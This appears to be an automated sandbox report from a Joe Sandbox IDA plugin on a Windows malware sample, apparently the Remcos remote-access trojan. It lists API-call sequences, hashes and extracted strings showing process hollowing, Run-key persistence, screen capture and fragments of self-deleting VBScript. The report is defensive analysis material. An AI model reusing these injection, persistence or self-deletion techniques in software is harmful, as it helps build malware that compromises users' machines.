                                                                                          • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                                                                                          • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-3916222277
                                                                                          • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                          • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                                                                          • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                                                                          • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: GetLocaleInfoEx
                                                                                          • API String ID: 2299586839-2904428671
                                                                                          • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                                                                                          • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                                                                          • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
                                                                                          • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$FirstNextsend
                                                                                          • String ID:
                                                                                          • API String ID: 4113138495-0
                                                                                          • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                                                                          • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                                                                          • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                                                                                          • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                          • String ID:
                                                                                          • API String ID: 1663032902-0
                                                                                          • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                          • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                                                                          • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                                                                          • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001), ref: 0044F1ED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
                                                                                          • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                                                                          • Opcode Fuzzy Hash: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
                                                                                          • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 2692324296-0
                                                                                          • Opcode ID: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
                                                                                          • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                                                                          • Opcode Fuzzy Hash: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
                                                                                          • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001), ref: 0044F262
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          • Opcode ID: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
                                                                                          • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                                                                          • Opcode Fuzzy Hash: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
                                                                                          • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: NameUser
                                                                                          • String ID:
                                                                                          • API String ID: 2645101109-0
                                                                                          • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                                                                          • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                                                                          • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                                                                                          • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                                                                          APIs
                                                                                            • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                                                                          • EnumSystemLocalesW.KERNEL32(Function_000458CE,00000001,0046B680,0000000C), ref: 0044594C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                          • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                                                                          • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                                                                          • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • EnumSystemLocalesW.KERNEL32(0044F087,00000001), ref: 0044F167
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                          • String ID:
                                                                                          • API String ID: 1084509184-0
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          APIs
                                                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                                                                            • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F32
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F35
                                                                                          • DeleteObject.GDI32(00000000), ref: 00416F38
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F6A
                                                                                          • DeleteDC.GDI32(00000000), ref: 00416F6D
                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                                                                          • GetIconInfo.USER32(?,?), ref: 00416FC5
                                                                                          • DeleteObject.GDI32(?), ref: 00416FF4
                                                                                          • DeleteObject.GDI32(?), ref: 00417001
                                                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                                                                          • DeleteDC.GDI32(?), ref: 0041713C
                                                                                          • DeleteDC.GDI32(00000000), ref: 0041713F
                                                                                          • DeleteObject.GDI32(00000000), ref: 00417142
                                                                                          • GlobalFree.KERNEL32(?), ref: 0041714D
                                                                                          • DeleteObject.GDI32(00000000), ref: 00417201
                                                                                          • GlobalFree.KERNEL32(?), ref: 00417208
                                                                                          • DeleteDC.GDI32(?), ref: 00417218
                                                                                          • DeleteDC.GDI32(00000000), ref: 00417223
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                          • String ID: DISPLAY
                                                                                          • API String ID: 479521175-865373369
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                                                                          • ResumeThread.KERNEL32(?), ref: 00416773
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                                                                          • GetLastError.KERNEL32 ref: 004167B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                          • API String ID: 4188446516-3035715614
                                                                                          APIs
                                                                                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                                                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                            • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                            • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
                                                                                          • ExitProcess.KERNEL32 ref: 0040C389
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                          • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$t<F$wend$while fso.FileExists("
                                                                                          • API String ID: 1861856835-1953526029
                                                                                          APIs
                                                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                                                                          • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                                                                            • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                                                                          • Sleep.KERNEL32(000001F4), ref: 004110E7
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00411114
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                          • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                                                                          • API String ID: 2649220323-71629269
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0040B882
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                                                                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                                                                          • _wcslen.LIBCMT ref: 0040B968
                                                                                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                                                                          • _wcslen.LIBCMT ref: 0040BA25
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                                                                          • ExitProcess.KERNEL32 ref: 0040BC36
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                                                                          • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                                                                          • API String ID: 2743683619-2376316431
                                                                                          APIs
                                                                                            • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                                                                            • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                                                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                                                                                            • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                                                                                            • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                                                                                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                                                                          • ExitProcess.KERNEL32 ref: 0040BFD7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                          • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                          • API String ID: 3797177996-2974882535
                                                                                          • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                                                                          • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                                                                          • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                                                                                          • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                                                                          APIs
                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                                                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                                                                                          • SetEvent.KERNEL32 ref: 004191CF
                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                                                                                          • CloseHandle.KERNEL32 ref: 004191F0
                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
